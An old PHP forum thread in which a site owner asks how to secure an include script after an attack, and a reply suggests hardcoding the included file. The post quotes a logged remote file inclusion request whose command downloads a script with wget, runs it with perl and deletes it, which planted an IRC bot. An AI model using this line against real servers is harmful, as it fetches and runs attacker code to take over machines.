[RESOLVED] i need help asap with include

PaPPy

ok i need to make this script more secure asap!

<?php

if ($body == "news.php" ) {
   include $body;
} else {
   include "403.php";
}

?>

i have listen out in the first part all my pages
my URL is index.php?body=news.php and etc for other approved pages

but somehow someone was able to do this

index.php?body=(site address).com/thefive/tool.gif?&cmd=cd%20/tmp/;wge
t%20(site address)/gif.txt;perl%20gif.txt;rm%20-rf%20g
if* HTTP/1.0" 200 13533 www.pappyspage.com "-" "Mozilla/5.0" "-"

and it shouldnt have gone through but it did and the script created a bot irc on my webserver. luckly the port the used was blocked via the firewall

but i need to fix this asap

konrad

I'm not sure if this could help, test it on your server

<?php

if ($body == "news.php" ) {
   include "news.php";
} else {
   include "403.php";
}

?>

or better don't let the user to pass filename by URL:

<?php

if ((int)$body == 1 ) {
   include "news.php";
} else {
   include "403.php";
}

?>

PaPPy

well i found out this happened when my code was vulnerable back in march

the way i have it now doesnt allow for the above code to work